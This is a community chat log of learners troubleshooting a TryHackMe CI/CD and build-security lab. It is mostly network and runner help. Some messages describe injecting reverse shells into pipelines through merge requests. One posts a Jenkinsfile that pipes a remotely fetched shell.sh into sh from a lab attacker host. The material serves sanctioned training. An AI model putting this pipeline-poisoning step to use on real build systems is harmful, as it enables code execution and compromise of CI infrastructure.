#ci-cd-and-build-security

first

Tim too fast 😂

Oh come on, I try to race Tim and Amo3 beats me

Fixed.™️

Looool

🔥

is the jenkins IP in the network diagram hidden on purpose? 🤔 Or is that just on my end

this does not apply

oh darn it

Jenkins the host will be black but its IP should show. If not the case send a screenshot and will check

Mmm, this was installed but let me check if there was maybe a revert

Just quickly hit refresh on the room?

thaat fixed it now, cheers

Cool, just refreshed the config on my side

Yeah we had a revert. Just going to remove the line. As this is a subs-only room internet access is provided on attackbox for install and takes like one extra minute. Once change is pushed I'll readd the line

curious if I am missing something here. After running the the deployment the files are created in /tmp/ but there is no server running.

sudo apt install php7.2-cli - quickly run this? I think we have both the gitlab runner and php as an issue currently. So after this, just run the pipeline again

ah, yup. Have not checked that.

Have also updated the text

phew task 9 gives me headaches 😅

Were you able to overcome said headaches?

nah, still trying 😄

You can do it!

@potent grotto may I dm you? I m not sure, if I did the intentional thing to get the flag for task 10

Sure, go for it

hi guys, i have created the runner and set it to run for untagged jobs and it is reflected in the gitlab runners section for the project forked. However, when i commit, it is in pending stage with the following error ->

This job is stuck because the project doesn't have any runners online assigned to it.
Go to project CI settings

For which task is this? Is it where you create your own runner? if so, does it display that the runner is active?

pls ignore .. fixed it 🙂. Im confused with the authentication to mother part 😦. where do i obtain the x values from the network diagram?

is the runner shared across projects?

What is the IPs in your network diagram?

depends on how it is configured. Need more context to answer this

Lost connection, waiting for another vote to reset the network!!

connection is back, it took a white for some reason

gitlab - 10.200.46.150. jenkins 10.200.46.160

mother will be in your case 10.200.46.250

ah ok - thanks man

Gave +1 Rep to @edgy frost (current: #345 - 13)

i mean do we need to configure the runner for each project or is it suppose to be shared across project? the first runner seems to have the shared option checked but when i ran the merge request, it says no runner is assigned -- task 6

You are not going to use the runner you created. There are other runners that have been configured for you which will become clear when you read the task content

Task 6 you are using reverse shell

maybe something broke along the way - let me rebuild it again

i thought the runner was suppose to execute the shell

on task 9 referring to runner number, on my screenshot above, I do not see that runner number

@edgy frost how do u add an image here? Im trying to share my screenshot but to no avail 😦

on chat click + sign then upload file

i dont have that option - im using discord web

I am also using web, see + sign on left side of the image

yeap - when i click on it, it only says 'Use Apps' , no other options

here what I see, may tryhackme stuff will help

hmm weird

@sweet briar You need to verify your account

yes you are right 🙂 sorry about that

How do we know whats the mother ip can anyone explain please

so back to task 6 - i am stuck here . Reverse shell is not established in netcat after creating the merge request.

#ci-cd-and-build-security message - see here

Thank you

But How do we know that

ip in your network diagram - take the first 3 octet and the last octet is 250

Ohhhh i see it said use your network diagram thanks

click on pipline #59 to see more details if any errors exist

this was the runner issue i was talking about earlier

How do we authenticate do we need new username and password or the one provided for ssh

the one provided

yes username is mother

Permission denied

make sure you typing correct passwod motherknowsbest

i created the runner and it successfully completed but no connection was established on the attackbox

did you notice download of the shell on the python server you created

only this

nothing on the listener

IP address you are using is it cicd (on ip ad command)

attackbox ip

how you got the IP? its not the normal IP we always use

use command ip a and look for ip with name cicd

ah ok - let me try

from the room "Using ifconfig or ip a, make a note of the IP of the cicd network adapter."

this cicd ip is updated in both the shell.sh and jenkins file?

yes

ah finally - Thanks @edgy frost !

Gave +1 Rep to @edgy frost (current: #314 - 14)

instead of getting a shell from jenkins, i got this

arghh

i saw the download on the http server

For reverse shell in task 6 i got this but didn’t get shell

I received connection but got nothing

finished the room but for task 9, when I get access to one of the server, then I can connect directly to PROD and DEV server directly, I was assuming as the room describe you need to intercept the product build and use the runner, clearly my solution is not what it suppose to be

Congrats! So intercepting a prod build when it locks the dev runner when you execute your malware was a bit tough. It would create quite a bit of a bottleneck for the challenge network. But yes, this would be the ultimate idea if you were to perform this attack in an actual client assessment. However, often you are also lucky with artefacts (like keys) for multiple environments being left on shared runners or build agents, which is what was simulated here

Congrats

Hi i did not understand how do i authenticate to mother and get flags

Can anyone expalin please

Can you provide more information on what you are trying here? It is explained in task 2 and through the information mother provides you. So what have you done thus far?

On task 7

You are hosting port 8081 using nc when you should be using a python webserver which would allow the Jenkins agent to download your webshell

Not the task, to use mother

Iam in to shell

Do i just need to find flag now or is there any thing i need to do for mother

Read the instructions in task 2.

Authenticate to mother and follow the steps provided

I read that but did not understand once we compromised how do i do it

Ok i think i got it now

From the message sent to you by MOTHER when you registered:

Once you have performed the actions to take control of the Android's pipeline, please reestablish a connection to mother.
If your access is deemed worthy, mother will award you with a flag for your progress

The second line

For task 7 the name is JAgent right? Build server

Right

What is Jenkins and what is JAgent?

Host name right

No, those are two different hosts. What is the purpose of each? As explained in the task?

Got it finally thanks man first i did not understand how to communicate with mother now i got it and git the flag

Got it

All good! Glad you got it. Trying to not just give you the answer but help guide you to it. Best of luck with the rest!

Thanks, I will redo this room this week to learn more about how all the components working together, and thanks for this room, this was one of the best walk-through room by far.

Gave +1 Rep to @potent grotto (current: #29 - 270)

Stuck into task 8 how do i start runner for task 8 do i need one or not? Iam having error in update readme.md too

How do i check if there is runner or not in “anactker” gitlab

Do i need to add the reverse shell uploader in .yml file. as in task 6 we did for dockerfile

.

gitlab host is unreachable although network is in running state

any ideas why the cicd network isn't showing up on my attackbox? I launched it from the room like I normally do. I can connect with no issues from my VM but wanted to perform the runners and other tasks from the Attackbox. However I don't see a cidc network.

So when you run ifconfig you don't see the cicd adapter? Also, are you running your cicd VPN file in an offline machine as well?

Yeah, I had that issue on one of the subnets (I think 10.200.46) and had to fully leave the room, wait a few minutes, and re-join to get a different subnet. Someone must have managed to break the hosts in that one. I voted for a reset but at that time I was the only one.

it happen to me too, disconnection, I need to refresh the page, sometimes I see network not running, so I start it again, refresh page might help, also some times diagram give wrong IP in my case suppose to be .6 and in diagram is .3 range.

i have manage to compromise the build agent in task 9 , now im at a lost on how to access both dev and prod systems

if you are in that server, treat it is as CTF look around and see what you can find

Another thing to think about, is how would the deployment get pushed from the runner (which you have compromised) into the environments? There are only so many options that could be followed here

Iam stuck in task 8 do we need to upload reverse shell in .yml

File

if remember correctly yes, try reverse shell on yaml file

i did use deploy to environment: staging but still getting shell on the runner - trying to figure out the following "read some sensitive information from the runner!"

finally!! - excellent material @potent grotto - i learnt alot!

Congrats! Thanks for the feedback!

Gave +1 Rep to @sweet briar (current: #1999 - 1)

For task 9 I'm able to get the runner shell but cannot figure out how to access DEV and PROD.

You need to do a bit of enumeration and try to understand how the runner would push changes to DEV and PROD

Solved it.

Even finished your AD networks. Thanks for creating such informative rooms.

Thanks for the feedback!

Gave +1 Rep to @vernal sundial (current: #1999 - 1)

could someone come to the room to reset the network?

You'll need to state your network.

10.200.3.x

Is there an issue with the network? I can't ping gitlab or jenkins from the attack box

Yup I had that happen too. Fully leave the room, wait about 5 - 10 minutes, then rejoin and you will hopefully be in a different subnet

My pipeline does not run , sometimes run just for 30 seconds . I will try to do everything again

Anyone who gets stuck on something, here's every task in full detail as I work through it:
https://youtu.be/Yz8MclV03MA?si=yYDFwKMNKlIfx90e
https://www.youtube.com/watch?v=4B0A6RLpCXg

Huge shout out to @potent grotto for the excellent work on this!

Why there’s no environment some one deleted

Earlier there was as 3 and after that it was 1 now there is zero

I compromised two times but its not working now we cannot commit change now

I waited 1 hour then there was 1 environment running since it’s public someone might have deleted accidentally

I had it already compromised but now i need to wait and start all over again

I'm working on Task 6 and this randomly happened:

Just in the last 2 mins

So apparently the attack box is scannable from the internet and is serving payloads when Task 6 is running. Is it supposed to work that way? It seems like automated scan traffic keeps hitting the machine

You're a subscriber, so you'll also have an external network.

It makes sense that I have external access. But it doesn't make sense that the attack box is scannable from the internet.

Why?

It has a public ip.

@vapid dirge This isn't a channel for advice on your business

@twin scroll
I thought this is a community where people help as well. No worries, other communities are quite generous

@vapid dirge This channel is for the tryhackme ci, cd, and build security path.

Try #general

can you guys just vote for reset. maybe it will help.

*only people on subnet 3 ^

finally. probably the best challenge on tryhackme. thanks to all creators.

but badge corrupted

report that in sight bugs so the tryhackme team can see it and maybe fix it

Yes. I got it yesterday.

All the networks have their own own subnets.

Gave +1 Rep to @compact field (current: #2 - 2012)

Is there a way to reset password on mother or re-register?

You can just re-register with a different name

root@ip-xx-xx-xx-xx:~# python3 enumerator.py
Traceback (most recent call last):
  File "enumerator.py", line 1, in <module>
    import gitlab
ModuleNotFoundError: No module named 'gitlab'

For Task 5: Securing the Build Source

I did run pip3 install python-gitlab==3.15.0

Even stack overflow isn't helping much here

oh nevermind it looks like creating a virtual environment did the trick

Did you get this to work?

I see it download but not execute the shell

Oh my god I finally got it to work 😵

port 8082 saved the day but I have no clue why 8081 didn't work

Wow that whole room was a challenge and a half but I learned a lot. 10/10 would recommend!

right

Task 6 - merge test - won't work for me... I make a fork, edit the jenkins, commit, and merge request... but gitlab is pipeline stuck .. drilling down it claims no active runner ... But this should use Ash's runner shouldn't it? If I create a runner for my fork - i shell my own attack box.

.... Thanks @edgy frost above you pointed out the directions are WRONG - do not use your attackbox ip - use the cicd network ip for the vpn in the ifconfig.

Gave +1 Rep to @edgy frost (current: #279 - 17)

ran into the same issue, using python3.9 explicitly did the trick for me

in the first lab I did the sudo echo and updated the /etc/hosts and still no gitlab page is coming? Anyone can help please? Stuck here

hi guys, I got a question about CI/CD pipelines please

#ci-cd-and-build-security

can anyone confirm if I understand right given these examples which are explained in the ci/cd room
Securing the Build Process vs Securing the Build Pipeline they both look the same but the difference that one is about preventing developers from directly merging to main and the other is about hardening the pipeline that even if he requests to merge but he shouldn't be able to approve himself. Right?

and one more question please, we always exploit either the runner or Jenkins agent, since it is the one going to execute the tasks "jobs", and DEV and PROD would be the environments that the code will be deployed to, so if we work on the DEV branch, changes would be deployed to DEV server and if we work on the PROD branch, changes would be deployed to PROD server after the testing done on the runners, and in this example it is the GRunner2 which is shared, right?
so the only way to take a reverse shell directly from PROD or DEV is to exploit the code that will be deployed not the build code ".gitlab-ci.yml" because in this scenario it would always be run by runners first even if they run the build code
could you please confirm ...

@compact field @lone zenith

Hi team,

In task 9 of the #ci-cd-and-build-security room, it instructs to "Navigate to the new repo at http://gitlab.tryhackme.loc/ash/environments/ to get started.", however, upon attempting to access it, a 404 error occurs. Any insights on what might be causing this issue?

not able to connect to cicidbuildsecurity network

2024-04-14 12:09:47 --cipher is not set. Previous OpenVPN version defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-04-14 12:09:47 OpenVPN 2.5.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 29 2023
2024-04-14 12:09:47 library versions: OpenSSL 3.0.2 15 Mar 2022, LZO 2.10
2024-04-14 12:09:47 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2024-04-14 12:09:47 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2024-04-14 12:09:47 TCP/UDP: Preserving recently used remote address: [AF_INET]52.208.87.208:1194
2024-04-14 12:09:47 Socket Buffers: R=[131072->131072] S=[16384->16384]
2024-04-14 12:09:47 Attempting to establish TCP connection with [AF_INET]52.208.87.208:1194 [nonblock]
2024-04-14 12:09:47 TCP: connect to [AF_INET]52.208.87.208:1194 failed: Connection refused
2024-04-14 12:09:47 SIGUSR1[connection failed(soft),init_instance] received, process restarting
2024-04-14 12:09:47 Restart pause, 5 second(s)
c^C2024-04-14 12:09:49 SIGINT[hard,init_instance] received, process exiting

any idea what might be the issue

HI, has anyone managed to complete Task 9 in CI/CD and Build Security room?

@potent grotto @lone zenith Can you please take a look at this issue? I can't find the folder /ash/environments/

Are you logged into the correct user as specified in task 8?

wow thanks, I missed that

Gave +1 Rep to @potent grotto (current: #29 - 277)

so I got the runner shell, the enum should happen on the runner shell right? do i need to do any merge on gitlab page to gain access to PROD and DEV? I got it via treat it like CTF challege, but still dont understand how the runner would push changes to DEV and PROD? (||if it's via SSH, then nvm||)

You can check it on ||gitlab-runner bash history||

Can we create a model that detect the intent of a prompt to classify it into a safe prompt or an injected prompt without relying on other model or a dataset?

Is the network down atm?

I am getting a permission denied error if try to execute the commands from bash history ? Can you please let me know what i might be missing 🤔

Are got the shell as gitlab-runner?

Yes i did

Try to stabilize your shell

Oh okay will try it out thanks 👍

Gave +1 Rep to @native kelp (current: #165 - 42)

Hi! I can't see the cicd network when i do the ip a command on the attackbox. I checked this channel and didn't find an answer. If anyone knows how fix this, thank you!

Try using the command with -a option it wud list all the adapters and the cicd wud be the very first one.

Thank you but it still doesn't show up, and when i ping the gitlab ip, nothing happens as well

^ Same for me. Also, I believe task 6 is broken because the GitLab access token has expired, see Jenkins log here #site-support message I figured out a different way to pwn the JAgent host, but it would still be great if someone can fix this issue

guys I'm trying to complete the room but, first i started the attack box , then i added the gitlab & jenkins to my etc/hosts , but when i try to enter it in browser , the server return with no response , anyone face thing like this before ??

is this still applicable? im currently at task6. I DO use my VPN ip address but i dont see any incoming connection on my python3 http.server. So after creating a merge request ( which is completed succcesfully ) , it does not download my shell.sh

Could be. I suggest you look at the next task, as that instructs you to login in to Jenkins. From there you should be able to see the error messages from the build task that was created from the merge request.

Thanks! Will do!

Gave +1 Rep to @topaz lodge (current: #1106 - 3)

hello everyone

I have some difficult to get a reverse shell at the task 6

Is it becasue the room is bugged?

I got this error in the jenkins server

I get the same error. I still haven't figured this out.

It seems I'm not the only one. Maybe a bug?

It seems that I provided the wrong password maybe I don't have the right? Or maybe the jenkinfiles is executed despite of this message error and something blocked to get the reverse shell?

Someone have an idea of how we can get the flag of that task ? It's not working too with me

Is anyone else having issues connecting to the gitlab url address when getting started in task 2?

through the attacker box I never reach the gitlab machine

but with the VPN is work. just be careful to choose the good VPN

in the network tab

should I expect to be able to ping the gitlab and jenkins servers?

yes

check ifconfig and you should see the cicd interface

thanks for the feedback
I have started that network a few times in the past 2 weeks without a problem, but today I have an issue, not with the network but with the VPN server: it does not regenerate new VPN config files Also, after I hit the regenerate button, it hangs for a while (never happened before)
So, I can start the VPN for that network and I get a cicd network interface, but I cannot ping the gitlab and jenkins servers. So, I am stuck
This behaviour today is common for the AttackBox and my local Kali VM

I had similar problem yesterday

ha I never had a problem when the cicd netowrk interface was present

anyway, maybe we should contact the support for the task 6

@topaz lodge said that the problem is because the API key is expired

maybe it is possible to renew the token directely in the jenkins server

About task 6, I have seen users reporting issues about tokens in this channel
I do not know if THM staff monitors this channel, or whether another channel like #room-bugs is more appropriate
no idea whether a work-around exists, like renewing that token
for me, I'll just leave now and check back tomorrow

Hey everyone am having issue in task 2. My gitlab ain't working after configuring and trying to restart network

If anyone can help it would be a great help

Yea mate am also stuck there after trying out many tutorials it's still not working

You found any solution

Not sure if your message is a reply to mine, as the referrence to original message says "Message could not be loaded"
Anyway, as an update:

• I have seen several users complaining, like @winged mist , who wrote a message under #room-bugs today
• my issues at this stage:
• not possible to regenerate VPN configurations
• not possible to ping Gitlab and Jenkins servers; other users in this channel say ping should be possible
  I have not attempted to go beyond that
  I think there is value if you add your contribution to the #room-bugs , hoping it is the right way to get the attention from THM
  maybe for instance consider a reply to the message by @winged mist here:
  #room-bugs message

Alright I hope they fix this issue

Extra info, I have had the issue since yesterday, besides pinging, I have tried to telnet on 80 and 443, too since there should be a web interface available on the jenkins and gitlab server, without success.
I have created a ticket for the issue (and I am guessing I am not the first one). Not the first time I was not able to download (or refresh) the vpn config but first time it persisted so long in time (in my experience).

thanks for the heads-up
ticket: that is a new thing for me, how do you go about that?
OK: found the way to create a ticket

Gave +1 Rep to @versed crow (current: #2219 - 1)

Yea usually it gets fixed or something but this ain't working for a quite few time

still can't generate the VPN config for this one unfortunately. Anyone else had any success?

I can generate, but not regenerate, and I cannot ping the Gitlba and Jenkins servers
I suggest you open a support ticket for this
when you describe the issue, be sure to document the subnet, or subnets, you have been assigned
screenshots are most useful in that context

I'm having this same issue. But I can't get the cicd network interface

just saw your message in #site-support
my latest feedback is just that message before yours: #ci-cd-and-build-security message
in addtion to the CI/CD network, I also have issues with the Wreath network, in addition of the problem already aknowledged by THM for the Holo network
I think it is worth taking the time and opening a support ticket, so that THM is formally informed of the issue and can get an idea of the scope of the problem
if you do so, please include enough descriptions and screenshots In particular, document the subnet or subnets you had been assigned when encountering the issue

I already sent them ticket. Hopefully they get back to us soon

about "soon": previous messages on the #site-support seem to indicate that THM support normally processes tickets within 1 to 3 days, Monday to Friday, and that sending reminder emails sends you to the back of the queue

Task 6 is still broken as jenkins does not download the shell script due to a failed pipeline

This isn't a THM issue, it's a github one.

https://tryhackme.com/r/room/cicdandbuildsecurity

can someone vote for reset the machine? the site doesnt work.

Subnet: 10.200.6.0/24

Please state your subnet too, so people can actually help 😄

10.200.6.0/24

Any one else struggling with figuring out what to do to get the flags for Task 9? I've managed to get the reverse shell on the runner, but there's nothing I seem to be able to do to escalate privileges or find a path to the dev or prod envs?

any fix for the "bug" in task 6?

i saw that a lot of people had the same problem

i've been troubleshooting task 6 the whole of today and can confirm jenkins still doesnt download the shell script

any fixes available?

Hi, all. In answer to a couple of the questions above related to task 6. I found a workaround after struggling for a while. I don't think it's how it's intended to be solved but it let me continue working.
If you skip forward to task 7 and use the jenkins login. Click through the Test Pipeline twice to my first picture.
Then click 'Configure' from the options on the left. Scroll down to 'Pipeline' and you should see the error under the Repository URL (second picture). Under 'Credentials', if you click 'Add' then 'Jenkins' you'll get a popup for a new credential. The 'Kind' should be 'Username with password', and if you fill in these with your login for Gitlab that you created in Task 4. Your password can either be that password, or your api token you created in task 5, either should work. Add this and make sure it's the selected credential. The error text should disappear and Jenkins will be able to build your pipeline now (make sure to save/apply these settings).

Of note in task 6, something I spent a lot of time confused about is where you are asked to replace the 'ATTACKER_IP' in the reverse shell command and the Jenkinsfile. Use the cicd adapter IP in both cases here, that you can find with the 'ip a' command.

Let me know if this helps anyone out.

Amazing, thanks very much for posting this. I wasted so much time today trying to get this to work thinking I'd messed up the ports or the config or something and every time I checked it looked ok. I was about ready to give up when I came here and saw this which helped me get sorted and now I can move on. Thanks for your help!

Gave +1 Rep to @naive mesa (current: #2273 - 1)

yo thanks for that, this worked, idk how I missed your post before, big thanks!

Gave +1 Rep to @naive mesa (current: #1508 - 2)

A patch has been released for this network, should be back to normal now! 😇

Hi, the room is still broken for me.

Yesterday was ok. Went back to it today and it is broken. Already reseted the network.

Both with external VM or with AttackBox, the machines are not accessible (ping fails, and browser access to the GitLab link times out), even after the setup is all done.

Any idea? Or anyone with same problem?

Hello everyone. How can i use route setting on my openvpn server. I want to make it work only with discord ips

Hi DevSecCops gang , if you are still stuck, please reset your network to use the updated infrastructure with the patch 😇

Sorry to hear @safe nexus , please can you try again now?

All ok now. Room completed.

Thanks a lot 🙂

Gave +1 Rep to @lone zenith (current: #505 - 10)

Thanks a lot for this! Was stuck for quite some time. Can someone please help me understand why are we using cicd adapter ip address here?

Gave +1 Rep to @naive mesa (current: #1167 - 3)

Hi, I've been trying to start this network for some days now and it fails every time. Is this a known issue that is being worked on?

Hello, what is the error message you are getting?

Hi Tim, sorry was out for a few days - the error appears top right immediately "Uh-no! Failed to start the network". Some searching here showed me that others have seen this also, but I could not find any solution

Hello, please try this route (which has worked on other networks):
Leave the Network (Options > Leave) and rejoin the room

Is there a way to reset the password for our MU-TH-UR 6000 user?

you can just register another user.

It gets linked to your THM username, and I think the flags are generated only for your THM account

you are talking about the mother one right?

Yep, I ended up opening a support case last night.

dude you can simply create a new user. Choose the 1st option "Register"

That works, thank you!

Gave +1 Rep to @lavish mortar (current: #16 - 490)

I was under the impression you had to use your THM user account for the flag to be valid. Your advice worked, TY.

Does anyone know what is the when the Gitlab server will not register me as a new user? Error is 422 "The change you requested was rejected."

Hey can anyone help with my build job post creating the runner - the job seems to fail instantaneously. Also the log dont help much

check this previous message, replying to another instance of the problem you seem to describe: #room-help message
I did not get a reply though
it would be great if you could provide feedback
thanks in advance

Gave +1 Rep to @summer wolf (current: #2408 - 1)

Hello! the reverse shell worked for everyone, right? Because mine wouldnt work 😦 the shell.sh file is OK, the "Attacker IP" I used the one of CICD interface (because I also tried with the attack box), nc is listening at the same port where the reverse shell supposed to call back, the python -m server is reachable, I get the shell.sh file from my OVPN machine, the gitlab runner and the jenkins file changed are OK and the merge request OK also with the runner.... I even see the change on the on jenkins file with the CURL to the attacker IP ... but I dont receive the call back 😦 ..... Anyone tried with a different payload?

Thanks 🙂

Done 🙂

@C. How did you manage to fix it?

I am not getting a callback

Also I get:
root@ip-10-10-142-212:~# nc -lvp 8081
nc: getnameinfo: Temporary failure in name resolution

use nc -lvnp 8081 the -n is to not to any DNS or service lookups on a specified address, hostname, ports as per the man page

.

This room really needs to be updated to reflect that u need nc -lvnp and the whole adding credentials to Jenkins.

Hi, is anyone avail to assist in the CI/CD Build Security Room? I am unable to connect to the Gitlab network, Task 2, from the Attackbox. It never shows the cicd network adapter.
I have left/rejoined the room. Restarted the attackbox twice after starting the gitlab network.
Edit: Resolved by using openvpn from the attackbox. Thanks

Hi

CI/CD and Build Security room isn't feasible with information given.
Do you know if an update will be carried out ?

How did u fix that? It's literally the same for me 😄

I am trying the "CI/CD and Build Security" room (https://tryhackme.com/r/room/cicdandbuildsecurity) but I can't start the network. Error message: "Uh-no! Failed to start the network".
I see in the Chrome DevTools console that the server returns 403 Forbidden, when I push the button. Starting single subscriber VM:s seems to work. But not this network.

I also see this in the response. {"status":"error","message":"User is not in network"}

But I can ping 10.10.10.10 in the THM network and it is also works fine to view the web page at that address.
So I do not know that "User is not in network" refers to.

use the Options button to leave and then join again

Thanks @vernal ivy! It seems to work!

Gave +1 Rep to @vernal ivy (current: #16 - 546)

hi all. I seem to have issues with this room:

• I can't install php7.2-cli - apt just says there's no available package. the attackbox already seems to have php 7.4 on it
• roughly 20 minutes into any attempt on the room the attackbox freezes and I'm never able to connect to it again from the browser. terminating the machine or clicking start attackbox at the top of the page seems to reset it entirely and I have to start all over. is there an alternative button somewhere I can hit to just reboot it?

maybe this helps: #room-bugs message

thanks mate. I'll give it another shot - hopefully no attackbox freezing tonight

Gave +1 Rep to @vernal ivy (current: #16 - 550)

does anyone have a solution to this? I seem to be running into this problem. I also don't have the php7.2-cli installed because it just wont install on the attackbox.

check this, for both issues: #room-bugs message

on the tryhackme CI/CD room, I authenticated with MOTHER but once the network had reset, mother still saved my credentials. I no longer have my credentials. how do i revert this?

Hi I am stuck with CI/CD and Build Security room. I forgot my password (to mother) and now I neither cannot login nor to register again. How to proceed??
I even restarted the room and reset all progress but it didn't help

check this: #ci-cd-and-build-security message

you can just re-register
check this: #ci-cd-and-build-security message

ty

Hi Again! Can anyone help with Task6 ? Build script on marge seems not working - shell.sh is not being downloaded and executed all

it's simply not working. Or should I set any runners?

Merge request is just pending forever saying that

This job is stuck because you don't have any active runners that can run this job.
Go to project CI settings

should I add some runners?

maybe this helps: #ci-cd-and-build-security message

Ah so! Cicd network ip..

cicd interface is really different than attacker box IP.. let's check )

YES!!!! Mein got! Someone should fix it in the task 6 description:
"Make sure to modify ATTACKER_IP to be your VPN or AttackBox IP."

I use attacker box but IP should be

hihi i'm stuck after committing the changes of ReadME file. It's at pending stage for the longest time. May i ask if there's any way to address this?

I'm currently unable to start the network, even with an attackbox loaded into the website, it just gives me a general error without much to go off of. I've tried at a few different times, under different sessions, etc.

Leave the room with the options, and re-join in 15 min(s).

hey, i got a devops internship and i'm looking for cybersecurity rooms in thm that can help me to get more knowledge

Hi,
I would like some help to know how to get this to work please !

• Room: cicdandbuildsecurity
• Task: 6
• Issue: can't get the jenkins file to be executed, I can get a reverse shell by adding the exact same command in the gitlab-ci.yml, but i can't even get the curl request if done from the jenkins file. I'm using the attackbox and i did use the cicd ip

Same problem. I set IP from cicd interface (tried AttackBox & OpenVPN) in shell.sh . Seems Jenkins is down. I tried recreating repos multiple times.
http://jenkins.tryhackme.loc:8080/ and by IP ( http://10.200.0.160:8080/ ) don't respond with UI. Also ping doesn't work for Jenkins (Although JAgent is reachable)

anyone had problems with installing the : sudo apt install php7.2-cli ? E: Unable to locate package php7.2-cli
E: Couldn't find any package by glob 'php7.2-cli'
i installed in my own vm through openvpn the "php8.1-cli " instaed, and make the levels to register the ruuner successfully , and when i am updating the readme file , the pipeline is falling to start and ist showing as in red color in the first step, anyone has solution for this? .... even tried to install thr php 7.2 from the attackbox and what i got: E: Package 'php7.2-cli' has no installation candidate

this one is my absolute favorite

#red-team-capstone-challenge is my 2nd

hi can anyone help with the creation of my pipeline, my gitlab runner keeps failing

Hi there is an issue with the build portion of the script in the yml file

is this room still working, im not even getting ping response from github ip. im using attackbox

Hello,
I am really struggling to get past the Securing the build process.
I am using my own laptop as an attack machine
I was able to setup the vpn and connect to it
I am able to connect to mother
But when I create the merge request with the Jenkins changes, the build doesn't get triggered
I am not sure what I am missing.
I tried to do this from the tryhackme attackbox also but no luck.

I don't see any activity on the http server when I create the merge request. The job times out eventually

yeah this is the same issue I am also having

The original repo should have a webhook setup but doesn't look like Jenkins is picking it up

Anyone there?
Following up on my last request

For anyone having issues on "Task 4" and recieving the following error, the fix is below:

ERROR: Job failed: prepare environment: exit status 1. Check https://docs.gitlab.com/runner/shells/#shell-profile-loading for more information

Modify the following file by commenting everything out, as below:

/home/gitlab-runner/.bash_logout

#if [ "$SHLVL" = 1 ]; then
#    [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
#fi

is network down?

I was trying to access gitlab but it shows me timed out error. I have added both the ip in /etc/hosts. Also network status is running. Any solution?

@nova sleet @rare hare

leave the room , close the attackbox and rejoin after 15-20min

Then start attackbox again

Ohk

The room cicdandbuildsecurity doesn't get connected to any network; the network gets stuck for indefinite time despite multiple leave room and rejoins; even the attackbox doesn't get the cicd interface IP

when using THM AttackBox, troubleshoot by running tryconnectme
refer to cicd_v2 for the VPN file

I am having the same issue, I am using my cicd network but says no runners available, I have even created my own runner which starts the job but then I don't get the reverse shell, should I be using my own runner or leave it with no runners

I too stuck with the same issue, have you got any workarounds on this

same here, it has been months with this problem yet no one did anything about it ? is there a way to contact the room support ?

while waiting for thm staff to fix it, for people who have a problem with the room "CI/CD and Build Security" task 6 flag you will find the steps to fix jenkins in the devsecops path channel.
or here is the link to the message : #devsecops-path message

hello

anyone here good with devsecops

any devs online??
to solve the infamous stuck point on task 6 for the lab?

I will try jenkins / credentials suggestion that was suggested in devsecops path

@proud harness
in Gitlab you need to create PAT and use that access token into jenkins > manage builds > credentials as pointed out in #devsecops-path
After creating Personal Access Token (PAT) in gitlab under "User Settings", "read_api" and plugged it in in jenkins/credentials as you pointed out.

2nd mistake I was doing was in the 'Jenkinsfile' and 'shell.sh' for the 'attacker ip' was putting 10.66.x.x. It should've been 'cicd' interface IP address 10.150.x.x/24.

a good test to see which IP is reachable to gitlab is "ping -I cicd gitlab.tryhackme.loc". None other interface could reach those, so that was an a noob mistake

@limber mantle what interface IP are you using in the "Shell.py" and in jenkins file?
you have to create runners before you can edit jenkinfile/commit merge request. I ran into same issue and learned that the hard way. and If you made this far with no runners, you will have to delete your forked project, re-fork, create runner and run in attacker machine, start listening on 8080/8081 python3 -m command,, create a PAT on gitlab side and put it in jenkins credentials, edit jenkins files and merge request.

Thnx @verbal cove

I did the needed tasks and the pipeline passed, how long does it take for the call back?

Yoo this is soo bad

within 15 seconds it was very quick for me
if it’s not quick for you, may have to delete that project and re-fork start over
i did so many times, i got fluent in it, wasn’t as painful after 3-4 times

I know i have been at it for 4 days

More than 12 re forks

In the last 2
I added the PAT and the runner

The build showed all greens but no call back

I check the 8080 webserver too

But the shell is not being called

@proud harness and i Assume you got 2 terminals/cmd prompt open on the attacker machine? one for 8080 and one on 8081 with nc-lvp command?
can you confirm what interface IP have you provided in the script fom the attack box?

yo @verbal cove

so heres the full rundown;

i fork the repo , setup the .sh file with the cicd ip and 8081 to catch , and give chmod +x to it ; host my python webserver on 8080 and setup nc -lvnp 8081.

on gitlab, do i need to have a runner made for this repo seperately? coz without it the deployment fails.....

and do i also setup a new credential line in jenkins so that the pipeline reads the repo... none of this is basically mentioned in the room directly though...

U know wht this is the first time in 5 years being at THM , I am actually frustrated when handling this task. Improper instruction and the op not working as intended

@proud harness I didn't document step by step for lab 6 since I tried it so many times I thought I will remember it. I reset that room for since to re-do that lab so i can help you, but looks like network is broken for me. I am not having CICD interface in the attacker box so I am unable to access/ping gitlab. Not sure when will it be fixed.

Continous integratuon continous delivery

i added the ip address to my etc/hosts in the attackbox but i still can’t access http://gitlab.tryhackme.loc websites

it’s keeps saying The connection has timed out the server at gitlab.tryhackme.loc is taking too long to respond

Finally got task 6 to work appalling step by step notes, What ended up working for me was changing the password of the jenkins user to a new gitlab PAT

then in the manage nodes / jenkins section you will see under agent one it requires a lable called agent.

based on this you need to add an extra line in the jenkins file to refernce this agent for the pipeline to use it

pipeline {
agent { label 'agent' }
stages {
stage('build') {
steps {
sh '''
curl http://10.150.60.4:8080/shell.sh | sh
'''
}
}
}
}

I would paste screen shots but looks like I dont have the ability . I hope this helps this has been haunting me for a while so much I left the room a few months ago hoping it would be fixed and just come back to it this week.

Hopefully this helps anyone stuck

Would like to know how to reset the network? I can't even vpn or using the attackbox to access the network.